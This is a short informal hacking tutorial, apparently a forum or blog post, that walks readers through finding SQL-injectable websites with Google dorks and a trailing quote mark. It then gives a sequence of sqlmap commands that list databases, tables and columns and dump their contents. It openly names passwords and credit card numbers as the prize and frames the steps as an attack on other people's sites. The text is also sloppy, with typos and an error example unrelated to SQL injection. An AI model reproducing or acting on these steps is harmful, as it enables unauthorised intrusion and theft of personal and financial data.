Hi dear hackers. Hacking database is a pretty cool thing you wanna do. Why databases? Certainly its about the information it holds such as passwords, credit card numbers even your girlfriend's phone number. So here I'm going to explain how can we hack into databases using sqlmap which is based oSQLql injection. So you ready? Ok let's begin.
Before you want to break into a database of a site, we have to find a website ensure whether it is vulnerable or not. You can use google dorks for this.
A. for example: inurl:index.php?id=1 just go through a few sites and put ' at the end of theselected url. www.targetsite.com/index.php?id=1'. If it returns an error, then it is possibly vulnerable to sql injection, say like:
Warning: include(include/.php) [function.include]: failed to open stream: No such file or directory in /index.php on line 38
B. fireup sqlmap and enter the following commands:
- sqlmap -u targetsite.come/index.php?id=1 --dbs (It retrieves all database in the server)
- sqlmap -u targetsite.come/index.php?id=1 -D dbname --tables(it retrieves all tables in dbname)
- sqlmap -u targetsite.come/index.php?id=1 -D dbname -T tablename --columns (retrieves columns of tablename such as id, username, password)
- sqlmap -u targetsite.come/index.php?id=1 -D dbname -T tablename -C columnname --dump
Then you will get table along with specified column names. Bingo! Happy hunting. Thank you.